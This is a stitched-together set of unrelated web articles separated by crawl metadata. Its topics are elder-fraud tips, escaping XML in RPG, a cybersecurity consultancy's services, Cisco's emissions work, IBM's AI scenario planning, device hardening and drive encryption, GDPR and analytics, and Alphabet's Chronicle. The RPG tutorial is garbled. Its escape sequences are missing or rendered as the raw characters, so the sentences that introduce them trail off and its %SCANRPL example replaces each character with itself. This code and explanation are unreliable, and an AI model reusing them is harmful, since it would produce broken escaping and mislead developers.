cash-only deals or expensive upfront payments. - Avoid romance scams - According to the US Department of Justice, an online love interest who asks for money is most likely a scam artist. The FTC advises that individuals never send money or gifts to someone they haven’t met in person. It’s also a good idea to see if the photo is being used by more than one person by using the internet browser’s “search by image” feature. Experts recommend that individuals talk to a trusted relative or friend about any new online romantic interest. - Search online for the individual, offer, or business - Experts advise that individuals search online using the contact information (name, email, phone number, or address) and the proposed offer. Other people often post information online about individuals or businesses that attempt to run scams. - Beware of pop-up messages - Cybercriminals often use pop-up messages to spread malicious software. If an individual receives a pop-up message or locked screen, it’s recommended to immediately disconnect from the internet and shut down the device. - Keep devices up-to-date - It’s recommended to keep all devices updated, including anti-virus software, firewalls, and pop-up blockers. If you believe you or someone you know may have been a victim of elder financial fraud, the FBI advises contacting the local FBI field office and filing a complaint with the Internet Crime Complaint Center at www.ic3.gov. Suspected cases of identity theft can be reported to the FTC at Identitytheft.gov.
<urn:uuid:3f7c106f-6e90-4a2e-b6cc-617c11680db7>
CC-MAIN-2022-40
https://www.idwatchdog.com/fraud-against-elderly
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00533.warc.gz
en
0.92271
1,707
2.671875
3
Encoding XML (Or HTML) From Within RPG April 17, 2013 Bob Cozzi RPG developers who jump to the web and CGI programming soon learn that a stream-based syntax requires the use of certain control characters. Unlike native database, which uses structures and hidden attributes to control field size and starting and ending locations, HTML and XML rely on <i>tags</i>, agreed-upon syntax for start and end delimiters. You may be familiar with Comma Separated Values and the use of both the comma and the double-quote as the delimiters for that type of file. XML and HTML use much more verbose values as their tags or delimiters. Tags do double duty; they separate data and they group related data together. For example, the individual fields of data in an XML document are separated by tags, while a set of data (similar to a record in a database table) is grouped together with an outer set of tags. Something like this: <address> <street>123 Main St.</street> <city>Anytown</city> <state>Illinois</state> <postcode>60639</postcode> </address> The tags are given user-specified names. In this example, the tags named street, city, state, and postcode separate the individual pieces of data, while the address tag groups the inner collection together. HTML works the same way. A basic HTML document might look something like this: <html> <head> <title>IT Jungle</title> </head> <body> <h1>Bob Cozzi's Website</h1> <p>Hello World! </p> </body> </html> Looks very similar to our XML address example, doesn’t it? The tags separate the components of an HTML page into the header and detail pieces. But what happens if I have data in my XML or HTML that include the left or right bracket (greater than or less than symbols)? Those characters and a few others will cause a problem. Let’s look at the XML example first. If the address street is “123 <G> Main St.” then the XML parser will think that the <G> is some kind of XML tag and look for the closing </G> tag. If it can’t find it, the parser will fail. To accommodate the parse, XML and HTML have instituted escape codes. Escape codes come in two forms: escape sequence and symbolic escape code. The normal escape sequence begins with the two characters &# followed by the numeric ASCII code for the character, followed by a semicolon. For example, the escape sequence of the left bracket (a.k.a., the less than symbol) is: The numeric 60 is the ASCII code for the < symbol. Likewise, the right bracket (the greater than symbol) is ASCII 62, so its escape sequence is: If your XML data contains a < symbol, it must be translated into < in the data portion of the XML document. In other words, this. . . <street>123 <G> Main St. </street> . . .needs to be translated to this. . . <street>123 <G>l Main St. </street> Yes, it is that ugly and yes, it is required. As a consequence of this escape sequence, the ampersand character also needs to be escaped, otherwise the XML parser thinks you are starting an escape sequence of something else, and therefore it is invalid and fails. To escape an ampersand, you could use the following: But since the ampersand is so common, a symbolic escape code is available: The letters & tell the XML parser that you have replaced a real & with & it has the same impact as coding & however & is easier to remember and is CCSID agnostic. For most characters, XML supports the ϧ escape sequence. That is, you can insert A instead of the letter A if you really want to, but it is not necessary. There are, however, five characters that should always be escaped in your XML data. These five characters have special meaning to XML (such as the left and right brackets also known as greater than and less than symbols). You could in theory escape ever single letter/character in your XML data (the content between the tags) but why? XML only requires the following five escape codes. I also strongly recommend escaping a sixth character whenever you send XML over HTTP. Here are those six symbols along with their escape sequence. The percent sign is included in this list because it can create a problem if your transfer XML over HTTP. So be sure to escape it as well. It never hurts to escape and with only six characters that need it in XML, it is not rocket science. Escape To RPG When building the XML document in RPG, analyze the data before enclosing it in XML tags, and escape it. Fortunately in RPG IV at v7.1 it is incredibly simple to escape the data. In the example here, I use the v7.1 %SCANRPL built-in function. If you are not yet on IBM i v7.1 you can use the homegrown version named SCANRPL that I showed you in a previous article. myData = %SCANRPL('"' : '"' : myData); myData = %SCANRPL('''' : ''' : myData); myData = %SCANRPL('<' : '<' : myData); myData = %SCANRPL('>' : '>' : myData); myData = %SCANRPL('&' : '&' : myData); myData = %SCANRPL('%' : '%' : myData); After processing the above substitution values, the data stored in the MYDATA field is considered to be “escaped.” Note that when escaping the apostrophe (which we often refer to as a quote) it must be doubled up. That is a single quote must be doubled, and then enclosed in quotes, therefore four consecutive quotes or apostrophes are specified (line 2 above) to replace the single character. If you escape your data before embedded it into XML, the receiving-end will have a much easier time parsing the data and producing accurate results.
<urn:uuid:077d862c-c23a-4c84-83a1-d6bf32aff3c9>
CC-MAIN-2022-40
https://www.itjungle.com/2013/04/17/fhg041713-story01/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00533.warc.gz
en
0.872745
1,345
2.59375
3
Cyber security is the protection of computers, information technology systems, servers, data, and networks from digital attacks. Cyber security certification may include preventative measures like implementing computer network security to avoid malware attacks, executing application security before deployment, prioritizing end-user education to avoid erroneous security practices, and developing a disaster recovery and business continuity policy to counter the loss of operations and data. Cyber security also focuses on protecting sensitive data, establishing information security assists in data privacy and integrity, and adopting operational security measures benefits data protection. Cyber security is crucial when government, military, corporate, financial, and medical organizations collect, process, and store unprecedented amounts of data on computers and other devices. A significant portion of that data can be sensitive information, whether as intellectual property, financial data, personal information, or other types of data for which unauthorized access or exposure could have negative consequences. Organizations transmit sensitive data across networks and to other devices while doing business, and cyber security describes the discipline dedicated to protecting that information and the systems used to process or store it. As the volume and sophistication of cyber-attacks grow, companies and organizations, especially those tasked with safeguarding information relating to national security, health, or financial records, need to take steps to protect their sensitive business and personnel information. Arbour Group’s Cyber Security Services At Arbour Group, whether it is Security Risk Consulting, Security Assessments, Audits, Security Programs Design and Implementation, Vulnerability Management, Penetration Testing, or Incidence Response, we can help you achieve your goals of Cyber Security. We can perform Cyber Risk Assessments that consider any regulations that impact the way your company collects, stores, and secures data, that include but are not limited to: - Payment Card Industry Data Security Standard (PCI-DSS) - Health Insurance Portability and Accountability Act (HIPAA) - Sarbanes–Oxley Act (SOX) - Federal Information Security Modernization Act (FISMA) Arbour Group’s Cyber Security services include adherence to additional standards such as the National Institute of Standards and Technology (NIST) and additional frameworks that help you ensure sufficient cyber security certification. An organization needs to coordinate efforts throughout its entire information system. Some elements of cyber security include but are not limited to the following: - Network security: The process of protecting the network from unwanted users, attacks, and intrusions. Ensure that internal networks with sensitive operations and data are protected from changes and exploitation. - Application security: Apps require constant updates and testing to ensure these programs are secure from attacks. Implemented methodologies ensure unauthorized access is prohibited. - Endpoint security: Remote access is a necessary part of business but can also be a weak point for data. Endpoint security is the process of protecting remote access to a company’s network. - Data security: Inside of networks and applications is data. Protecting company and customer information is a separate layer of security and privacy. - Identity management: Essentially, this is a process of understanding the access every individual has in an organization. It ensures the appropriate people have the proper access to predetermined technologies. - Database and infrastructure security: Everything in a network involves databases and physical equipment. Protecting these devices is equally important as they are also vulnerable to malicious cyber attacks when used with cloud environments. - Cloud security: Many files are in digital environments or “the cloud.” as companies further transition from on-premise environments. Protecting data in a 100% online environment presents its own unique challenges. - Mobile security: Cell phones and tablets involve virtually every type of security challenge in and of themselves with sensitive information open to cyber vulnerabilities. - Disaster recovery/business continuity planning: In the event of a breach, natural disaster, or other event, data must be protected, and business must continue. For this, a plan must be pre-determined to maintain business continuity even without certain resources. - End-user education: Users may be employees accessing the network or customers logging on to a company app. Educating good habits (password changes, 2-factor authentication) is an integral part of cybersecurity. - Internet of Things Security: Technology that safeguards connected devices and networks in the Internet of Things (IoT). Software, hardware, and connectivity must be secure for the effective use and protection of digital data. For more information on Arbour Group’s Cyber Security services, contact us today! Arbour Group has provided us with competent validation project leadership that has enabled us to complete projects in a timely and cost effective manner. The use of Arbour’s validation product greatly facilitated the process. The regulatory assistance provided by Arbour Group has enabled us to enhance our compliance profile with life sciences customers. Their Managed Services for software development and quality assurance play a key role in controlling business risk and reducing costs. Arbour Group provided effective validation services to us and were a valuable part of the overall success of our company-wide ERP implementation. Their integration into our multi-phase ERP roll out was seamless and assured us of comprehensive regulatory compliance.
<urn:uuid:5d8aafa9-7ce2-4df6-8837-fd66bba8df66>
CC-MAIN-2022-40
https://www.arbourgroup.com/services/digital-compliance-services/cyber-security/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00533.warc.gz
en
0.911808
1,056
2.828125
3
We have both a responsibility and an opportunity to reduce greenhouse gas (GHG) emissions. In just the last 50 years, scientists and experts report global GHG emissions have grown by nearly 70%, and that GHG concentrations in the Earth’s atmosphere have increased nearly 30% in that same span. The data shows that our climate will continue to warm in the next 100 years, with significant impacts on people, wildlife, agriculture, the economy, and our planet. While Cisco has made significant progress in reducing our emissions — 41% reduction in Scope 1 and 2 GHG emissions over the last 10 years, for example — there’s plenty of work to be done to solve this global problem. At Cisco, corporate social responsibility is at the core of our business, our culture, and how we invest our resources. It’s why GHG emissions reduction is one of our most material environmental issues and a core component of our overall CSR strategy to accelerate global problem solving, through our technology and expertise, to positively impact people, society, and the planet. With Earth Day fast approaching, I recently spoke with a few Cisco experts representing the key areas of our GHG emissions reduction strategy. We highlighted how Cisco is specifically reducing global emissions by improving the energy efficiency of products and our operations while also encouraging our suppliers to improve their own operational energy efficiency. As part of the podcast, we discussed Cisco’s ambitious long-term GHG reduction goals and how they plan to achieve them in their respective areas of the business. My guests included: - Andy Smith, Global Sustainability Manager in our Workplace Resources organization - Joel Goergen, Cisco Distinguished Engineer - Abbey Burns, Sustainability Manager in our Supply Chain organization After listening, you’ll see that the earth’s natural cycles are being disrupted and that these disruptions impact all facets of our lives. As individuals, businesses, industries, and communities, we have a responsibility and an opportunity to help address this global problem. Subscribe to the Cisco CSR Podcast and stay tuned for new episodes on our efforts to accelerate global problem solving for people, society, and the planet. For those already preventing plastic pollution this #EarthMonth, please see our Earth Day 2018 giveaway terms and conditions.
<urn:uuid:a62d1d5c-45fe-4108-a0df-f19cd3ea7e88>
CC-MAIN-2022-40
https://blogs.cisco.com/csr/making-meaningful-progress-on-ghg-emissions-reduction
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00533.warc.gz
en
0.935216
465
2.609375
3
My team at IBM Research has created a unique tool, called IBM Research Scenario Planning Advisor, that can use AI planning to support risk management activities in areas like security and finance. IBM Research Scenario Planning Advisor is a decision support system that allows domain experts to generate diverse alternative scenarios of the future and imagine the different possible outcomes, including unlikely but potentially impactful futures. Planning and plan recognition Preparing for the future is fundamental to the success of most human endeavors, from playing chess to running a multinational organization. At IBM Research AI, we build AI-based systems that use expert knowledge and AI planning to reason about observations derived from relevant news and social media and generate explanations and hypotheses about the current state of the world—and many possible alternative future states. Planning is a long-standing area of research within AI. Planning is the task of finding a procedural course of action for a declaratively described system to reach its goals while optimizing overall performance measures. AI planning can help when (1) your problem can be described in a declarative way; (2) you have domain knowledge that should not be ignored; (3) there is a structure to a problem that makes it difficult for pure learning techniques; or (4) you want to be able to explain a particular course of action the system took. A plan recognition problem is the inverse of a planning problem: instead of a goal state, you are given a set of possible goals. The task in plan recognition is to find out which goal was being achieved and how. Scenario planning is a widely accepted technique by which organizations develop their long-term plans. Scenario planning for risk management puts an added emphasis on identifying the extreme yet possible risks and opportunities that are not usually considered in daily operations. Scenario planning involves analyzing the relationship between forces (such as social, technical, economic, environmental, and political trends) in order to explain the current situation, in addition to providing insights about the future. This process is depicted in the picture below. A major benefit to scenario planning is that it helps us to learn about and anticipate possible alternative futures. We use scenario planning because we cannot predict the future. We use AI planning, informed by expert domain knowledge, because some scenarios have never yet occurred and thus cannot be projected by probabilistic means. And we generate many different scenarios, exploring a variety of possible futures, because we want to be prepared for both expected and surprising futures. IBM Research Scenario Planning Advisor Our approach transforms risk management into a plan recognition problem and applies AI planning to generate solutions. It addresses several challenges inherent to this task. They include: (1) having inconsistent, missing, unreliable observations; (2) being able to generate not just one but many future plans; and (3) being able to capture and encode the necessary domain knowledge. IBM Research Scenario Planning Advisor includes tooling for experts to intuitively encode their domain knowledge and uses AI planning to reason about this knowledge and the current state of the world, including news and social media, when generating scenarios. In our recent paper at the 2018 Association for the Advancement of Artificial Intelligence (AAAI) conference , we first characterize the scenario planning problem as a plan recognition problem and then use AI planning to generate many possible plans. Finding one plan is computationally challenging (it is PSPACE-complete), but our system finds a set of plans. We transform the domain knowledge into a planning task, the risk drivers into observations, and the business implications into the set of possible goals. We then use planning to compute a set of plans. We cluster these plans and present a handful of scenarios to the users. Our system can be applied in network security, healthcare, and finance, enterprises which have at least two factors in common: (1) they have teams of analysts and domain experts who can provide the necessary domain knowledge to the system, (2) they generate many news events that can serve as observations of their current states and data points for where they are headed in the future. Our system is able to explain the past and project the future by providing a range of possible scenarios and an explanation for each scenario. Planning for risk management We currently have focused on applying our approach to scenario planning for risk management. IBM Research Scenario Planning Advisor is currently in deployment within IBM, supporting financial teams in their risk management activities. The system’s cognitive tools assist analysts in two ways. First, it provides situational awareness of relevant risk drivers by detecting emerging storylines. Second, it automatically generates future scenarios that allow analysts to reason about, and plan for, contingencies and opportunities in the future. The picture below shows an example of a scenario the system produces. Each scenario we produce highlights: (1) the potential leading indicators, the set of facts that are likely to lead to a scenario; (2) the scenario and emerging risk, the combined set of consequences in that scenario; and (3) the business implications, a subset of potential effects of that scenario that the decision-makers care about. Heike Riel's recent appointment as an APS Fellow attests her leadership in science and technology. While many distinguished physicists are part of the APS, only a handful are elected to the fellowship — and even fewer still are female. So when Riel learned last fall that she had been selected, she was deeply touched. “It’s truly an honor and I am humbled to have received this recognition from one of the most highly respected organizations for professionals in physics,” she says. “I am very grateful for my colleagues as well as the teams and institutions that have supported me along the way.” A team formed by IBM Research scientist Dr. Leo Gross, University Regensburg professor Dr. Jascha Repp, and University Santiago de Compostela professor Dr. Diego Peña Gil has received a European Research Center (ERC) Synergy Grant for their project “Single Molecular Devices by Atom Manipulation” (MolDAM).
<urn:uuid:49a9c3e3-7afb-4f59-ac38-32cf3ba1b732>
CC-MAIN-2022-40
https://www.ibm.com/blogs/research/2018/07/ai-scenario-planning/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00533.warc.gz
en
0.942967
1,234
2.703125
3
What Does It Mean to Harden a Device? Hardening a device means making it more resilient against threat actors. In the cybersecurity world, that means making that device more secure and resilient to attacks. By hardening a device, you are making it more difficult to break into for hackers. In essence, you are building the biggest, hardest "wall" you can around devices and services. Let's explain why this is the perfect term for device security. There is a saying in infosec. The only secure computer is one that is turned off. That's because there is no such thing as perfect security. If a threat actor is willing enough, they will break into a computer system. The idea of information security is to make your assets harder to break into than the other guy's. That's what it means to harden a device. You are making your computers more difficult to break into than someone else's. You are making the return on investment for breaking into your systems very low, and thus, the risk to reward factor is too large for most bad guys to consider. So, you need to harden your devices, but aren't sure where to start. Thankfully, there are a lot of good resources available online. Before attempting to harden all your hardware and software components, take a moment to develop a security baseline, first. Only after ensuring that you have a minimum level of security across your organization should you start attempting to hunt down and fix random exploits in your organization. Otherwise, you may end up just putting on a good show of IT theater. An Overview of Hardening Devices [VIDEO] In this video, CBT Nuggets trainer Keith Barker covers what it means to harden a device, which is an important step in creating a security baseline. What is a Cybersecurity Baseline? A security baseline in cybersecurity is a minimum recommended configuration for software, services, or hardware devices. Keep in mind, these recommendations are the bare minimum for meeting security requirements. Depending on your industry, you may need to meet more stringent standards. For instance, if you are in the healthcare industry, you will need to comply with both HIPPA and HITECH laws. Many people are already familiar with HIPPA, but not as many are familiar with HITECH. Both HIPPA and HITECH breaches can cost businesses tens of thousands of dollars per month per incident. Each violation typically includes multiple incidents, too. So, when reviewing or creating your security baseline, make sure to know whether you need to comply with any laws or regulations in the places you do business in. Otherwise, you could easily accrue hundreds of thousands of dollars in fines. Security baselines are a good checklist for IT professionals. With how complex information systems are today, even for small businesses, it is easy to miss changing a setting or disabling a specific service. Even worse, these security baseline checklists need to be constantly audited and tested as new security vulnerabilities are found. Creating and auditing security baselines isn't an easy task. It's common for businesses to have a mix of devices like laptops, desktops, smartphones, and servers. Likewise, many businesses are deploying a hybrid cloud environment. That means that a security baseline needs to be created for both local software as well as web-based services. Many vendors offer free documentation for securing IT environments. For example, Microsoft offers white papers explaining how to secure Server, how to control access to resources like Office 365, and what policies to use for Windows in an Active Directory environment. Don't let these resources go underutilized. Where to Find Cybersecurity Recommendations Though creating a security baseline for your organization might not be easy, it is not impossible. It will require research and work. Thankfully there are a lot of vendors and government agencies that do the heavy lifting for you. All you need to do is read their documentation and follow their guidance. I hear the skeptics among you criticizing that last statement. Why would you ever put your faith in vendors or government agencies? A healthy amount of skepticism is always a good thing, but the white paper documentation from industry giant IT software and hardware vendors has been trusted for decades. Likewise, though agencies like the CIA may not reveal all their secrets, they have special branches dedicated to helping organizations safeguard their IT infrastructure. In fact, the CIA and NSA regularly report exploits they find. Though many vendors will have security procedures and recommendations available for their products, and there are tons of government agencies, it would behoove us not to mention the three big players here: Microsoft, Cisco, and NIST. Where to Find Microsoft Security Recommendations From Microsoft Microsoft is one of the largest corporate software vendors. Their Server OS, Windows operating system, and productivity suites are some of the most installed pieces of software in the world. Likewise, Microsoft's applications are some of the most configurable software on the planet, too. Microsoft's reputation depends on them to be able to deliver a usable and secure product. So, they also create documentation for all their applications, from Server to Windows and Office, on how to configure, manage and secure it. Microsoft has a lot of documents outlining recommended security baselines for their products, but a good place to start is here. Where to Find Cisco Security Recommendations Cisco is one of the most recognizable names when it comes to IT network equipment. So, it would only make sense that Cisco would have tons of documents explaining how to secure their hardware and software. Thankfully, a lot of Cisco's security suggestions can be used with hardware from other vendors as well. You may need to reference documentation from those other vendors to find specific settings or to cross-reference vendor-specific terminology, but it is possible. If you would like to reference Cisco's documentation, look at document number 13608. Where to Find NIST Security Recommendations One of the best places to stay up to date regarding new security vulnerabilities is NIST. NIST has a database of all known security vulnerabilities for a lot of software and hardware. Anyone in the IT trade needs to regularly visit NIST's website. That database mentioned above is free, too. NIST doesn't hide information behind paywalls. Though NIST catalogs security issues, they don't go into the nitty gritty of how each vulnerability works. It would still be worthwhile to investigate any vulnerabilities thoroughly that may affect your business. NIST is a perfect starting point for those investigations, though. One of the best features offered by NIST is their newsletter. NIST will often send subscribers notifications of any potential new vulnerabilities before those vulnerabilities hit the news cycle. By the time a new vulnerability is being reported by more mainstream tech media outlets, it can be assumed that bad actors are already exploiting it. It is best to subscribe to NIST's newsletter and stay ahead of the cybersecurity curve. The Risk of Mobile Devices Imagine, for a moment, that it is your job to safeguard all the secrets of an organization. Those secrets are stored in a super-secure storage facility, but that information is also stored in pieces on hundreds of different mobile devices like laptops and smartphones. How do you secure those mobile devices? The problem with mobile devices is that they cannot be continuously monitored. It's too easy to pick up a smartphone or laptop and walk away with it. Once that device is in the hands of threat actors, it's only a matter of time before they can steal the information from it. Often that information is worth far more than the device itself. You can harden mobile devices. For instance, you can disable unused accounts on Windows laptops and prevent someone from being able to log into it. You can set proper permissions for folders in that laptop's storage drive. You can even create policies that allow you to remotely remove information from that laptop. However, none of that matters if a bad actor can physically remove storage from a device. So, what do you do? One of the ways you can harden mobile devices is by encrypting them. What is Drive Encryption? Drive encryption involves turning data into unreadable chunks by passing data through various algorithms. Depending on the algorithm used, those unreadable chunks may not be able to be used without a key to reverse the random noise added to that data. What are Self-Encrypting Drives? Self-encrypting drives are storage drives (hard drives) that do not require software or user input to encrypt data stored on that drive. Encryption is automatic. Self-encrypting drives use the computer's TPM to store the private keys used for encrypting and decrypting the storage drive. The most common standard of self-encrypting drives is OPAL drives. What is Whole Disk Encryption? Whole disk encryption is the process of encrypting all storage blocks on a drive and not just single files. This is different from file-level encryption. Whole disk encryption typically requires a user to input a password when a computer starts to decrypt the drive. That's because the boot files are also encrypted, too. A computer won't have any idea of what to do until the drive is decrypted. On the other hand, file-level encryption only encrypts specific folders or files on a drive. Whole disk encryption does impose performance impacts on a computer system. Likewise, once a drive is decrypted, its data is fair game for hackers. So, make sure to weigh the pros and cons of whole-drive encryption before implementing it. It's not a magic security bullet. The most popular way to perform whole drive encryption today is BitLocker. BitLocker is a Microsoft product. It is included with Windows Pro and Enterprise by default. Another common application for whole drive encryption is True Crypt. Though True Crypt was discontinued years ago, it has many forks that are still being maintained today. By now, you should have a good idea of what it means to harden a device. Before we end this article, though, let's go through a quick recap. Hardening a device is the act of making it more secure than someone else's. There is no such thing as perfect security, so your job as a cybersecurity professional is to make your IT infrastructure harder to break into than someone else's. There are multiple ways of hardening devices. One of the first steps you need to take is developing a security baseline. A security baseline is like a checklist of tasks that you can perform to meet a minimum-security standard. As new exploits are discovered in the wild, that security baseline should be updated, and devices should be audited. Mobile devices require extra attention simply because they are mobile. Once a device is outside of the grasp of an IT administrator, threat actors have tons of ways of stealing data. The best way to prevent data theft from mobile devices is by encrypting them.
<urn:uuid:dfef2c3b-1910-42da-8a0e-e68abbd3cf0b>
CC-MAIN-2022-40
https://www.cbtnuggets.com/blog/technology/system-admin/what-does-it-mean-to-harden-a-device
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00533.warc.gz
en
0.945014
2,230
2.734375
3
Since the commencement of GDPR, companies across the world – and not just the EU – have been under immense pressure to comply with the new regulations. Given the fact that GDPR is one of the most far-reaching data protection laws ever created, its impact on businesses is apparent – especially for those in the area of big data and analytics. GDPR imposes several restrictions on how companies collect, store, processes, manage and analyse data, governing every aspect of data use – from storage to portability, accessibility, to consent. It also places control over the overall ownership of personal data back into the hands of users, thereby getting rid of the gray area that previously existed. So, how does GDPR impact big data and analytics in general? And what can you do to enable and ensure compliance? Let’s find out! What impact does GDPR have on analytics? The General Data Protection Rule (GDPR) is a regulation that looks to give end-users more control over how their personal data is collected and used. While the regulation was intended to safeguard the privacy of all citizens of the European Union, today it has become a worldwide norm. It has now compelled every enterprise to abide by the framework. Although GDPR has its bearings on every industry, its impact on data science is particularly massive. It imposes limits on how businesses profile customers and process personal data, compelling them to take several measures across data collection, user consent, data storage, usage, retention, and disposal. In a nutshell, with the implementation of GDPR, every organisation who uses analytics has to: - Be more transparent about what information they’re collecting, how they’re collecting it, what it will be used for, and who it will be shared with. - Take consent from users to allow the collection of information and give them the right to see what information is being stored and used. - Explicitly state how the collected information will be given to consumers through specific, informed, and unambiguous disclosures. - Remove information from their systems as well as every other organisation or system they’ve shared the information with – in case of no consent. - Provide proof of the steps they’re taking to be in compliance with the new regulation and how user information is being protected. - Notify users of a data breach within 72 hours and ensure compliance or face the brunt of fines as high as €20 million or 4% of the company’s annual global revenue – whichever is greater. How can you drive compliance? If you use any kind of data analytics – which you must be, given the digital era – you must be collecting data about your business, processes, employees, customers, markets, competition, and more. In that case, you have no choice but to take steps to be compliant with GDPR standards: from taking consent from users to collecting their information to deciding how long you can store user data before having it deleted automatically – there’s a lot you need to do to enable and drive compliance. Here are some tips: - Enable access control: To make sure your analytics systems are compliant with GDPR, a good place to start is by making sure data is only made available to authorised people. Having the right access control mechanisms in place is a great way to safeguard personal data. You should also have controls in place that keep a record of all data access – making it easier for you to trace instances of unauthorised access. - Anonymise data: Data anonymisation is a great way to ensure the privacy and protection of user information. To ensure GDPR compliance, you can either take the encryption route or remove personally identifiable information from your data sets, so people whose data you’re using remain anonymous. - Embrace privacy by design: One of the biggest steps analytics teams will have to take to ensure GDPR compliance is to embrace privacy by design – from how your analytics strategy is developed to how your algorithms, systems, and stacks are built – you need to integrate privacy and security in every element of your analytics framework from the very beginning. You also need to audit the data you collect regularly, limit its exposure, and document the information you collect, store, and process. - Disable automatic personal data tracking: With users spending so much time online, it is natural for companies to track their online activities for analytics purposes. However, for GDPR compliance, you might have to disable personal data tracking and have mechanisms in place to mask IP addresses, user IDs, and any other information that helps in identifying specific users. - Integrate consent boxes: Personal user data is a treasure trove of information for the modern business. If you want to continue tracking personal data, you’ll first need to get user consent. Integrating consent boxes with your website or mobile application is a great way to get the data you need while staying compliant with GDPR. - Revisit your data retention policies: Since the inception of analytics, companies have been collecting and storing user data in massive data warehouses and now on the cloud. However, with GDPR in effect, you can no longer store user data forever; you can keep it only as long you need it for data processing after which, it has to be deleted. This not only ensures the secure disposal of personal data, but also reduces the risk of using inaccurate, out of date, or irrelevant data for analysis purposes. Use GDPR as an opportunity For the analytics world, data is the lifeblood that ensures the accuracy and relevance of results. However, with the arrival of GDPR, it might seem like the available pool of data for analytics has decreased. But that’s not entirely true. The controls that GDPR brings with it aims to not only safeguard user privacy but also ensure the data that analytics companies use is updated, relevant, and accurate. Love it, hate it – but there’s no escape from GDPR. At the end of the day, the only thing you can do is to have controls in place to comply with GDPR and gain the trust of your customers.
<urn:uuid:40cac7d4-07bd-41ed-8cd4-c86c64e12328>
CC-MAIN-2022-40
https://www.inteliment.com/insights/gdpr-and-its-impact-on-big-data-and-analytics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00533.warc.gz
en
0.935411
1,249
2.515625
3
Everyone wants data—especially the people who shouldn’t have it. Those of us who watch the big data industry closely know how much damage cyberattacks can cause to companies large and small. When half of the United States’ personal information was compromised in the 2017 Equifax breach, every single American had to consider the possibility that they could be a victim of identity theft. Data breaches are not only a serious threat to businesses and consumers, they’re costly; each breach in the United States costs an average of $7.3 million. Cybercrime is getting more sophisticated and more common, because data is one of the most valuable assets organizations hold digitally. So, how can we hold back the tide of cybercrime and data theft? Cybersecurity has advanced, but it’s struggling to keep up with hackers’ new techniques. Now, one of the biggest players in the data game is leveraging its power with a new cybersecurity company. Alphabet, Google’s parent company, recently announced the launch of Chronicle, a dedicated cybersecurity company. The details are still somewhat hazy, but from what we know, it has potential to revolutionize cybersecurity as we know it. Below are five key pieces of information about Chronicle that you should know. Table of Contents 1. It will make sense of massive amounts of cybersecurity data. One of the most pressing challenges in the big data space is making sense of all the data coming in. The majority of it isn’t even used, leaving money on the table. For example, by some estimates, using big data effectively in the US healthcare system could create $300 billion in value. Unused data isn’t just a missed opportunity, however—it’s a vulnerability. The volume can get overwhelming and confusing, allowing security threats to fly under the radar. Thousands of security alerts can pop up every day in large enterprises, and security teams can’t possibly stay on top of all these alerts. Chronicle helps teams make sense of all this data, and reduces the manual monitoring companies have to do. 2. It will use machine learning to find patterns and anomalies. Chronicle’s systems make use of advances in artificial intelligence and machine learning to address these vulnerabilities. Machine learning uses these massive, unstructured datasets to spot patterns humans can’t find, and make sense of what’s actually a threat—and what’s normal. Because cybercriminals are always refining their tactics, it’s hard for traditional cybersecurity systems to keep up. A learning system like Chronicle could be the answer to spotting new types of malware and halting the evolving tactics used by cybercriminals. 3. It will help find solutions for large institutions and key industries. Both large and small companies are at risk for data breaches, but large companies and key industries are often major targets for attacks due to the sheer amount of valuable data they store. Healthcare organizations, for instance, are common targets. About 90% of healthcare organizations now use at least a basic form of EHRs (electronic health records), and healthcare data is some of the most sensitive data in existence. It’s crucial that we do a better job of protecting this information, to keep people safe and improve the care these institutions can offer. Chronicle’s focus is on large institutions like Fortune 500 companies, and the company is working to ensure scalability of its systems to protect key institutions. 4. It will streamline cybersecurity solutions to reduce vulnerability. Security teams aren’t going to be eliminated with machine learning and artificial intelligence anytime soon, and that is not Chronicle’s aim. The goal is to make security teams more effective and streamline their operations. Using one system simplifies the process and allows teams to work where they’re most effective. Chronicle’s CEO, Stephen Gillett, says, “We want to 10x the speed and impact of security teams’ work by making it much easier, faster and more cost-effective for them to capture and analyze security signals that have previously been too difficult and expensive to find.” 5. It will allow for faster reactions. In a perfect world, we’d be able to stop all cyberattacks before they happened. Unfortunately, we live in the real world, and like all crime, it’s impossible to prevent all cyberattacks. Breaches are going to happen, and the best we can do is to minimize their impact. Chronicle hopes to accomplish this by allowing companies to spot problems quickly and start taking action, controlling the damage and reducing the cost of a breach. Currently, some breaches aren’t discovered for months, and many go unreported. Chronicle’s machine-learning system should be more efficient at spotting threats as they occur than current systems, potentially spotting anomalies within minutes, or even seconds. 2018 will be a pivotal year for slowing the amount of cybercrime and getting a handle on hackers. Keep your eyes peeled for more about Chronicle’s upcoming endeavors in cybersecurity. Like this article? Subscribe to our weekly newsletter to never miss out!
<urn:uuid:1bfad2a1-5419-4e16-bd43-f469fdfb7d32>
CC-MAIN-2022-40
https://dataconomy.com/2018/02/5-things-need-know-chronicle-alphabets-new-cybersecurity-company/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00733.warc.gz
en
0.941069
1,060
2.703125
3
